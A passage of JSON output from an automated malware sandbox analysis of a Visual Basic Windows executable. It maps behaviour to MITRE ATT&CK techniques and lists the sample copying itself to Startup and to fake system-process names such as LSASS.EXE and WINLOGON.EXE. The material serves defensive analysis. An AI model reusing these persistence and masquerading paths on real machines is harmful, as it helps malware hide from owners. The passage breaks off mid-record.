"https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe to new location C:\\D3_08.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif to new location C:\\D3_08.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.scr to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.scr to new location C:\\D3_08.exe (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CopyFileA\" to copy C:\\\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005884)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4A6B.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4B2F.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE473F.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrD3_08.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4741.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"services.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"shell.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Empty.pif\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"New Folder.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"WINLOGON.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4A6B.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4B2F.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr 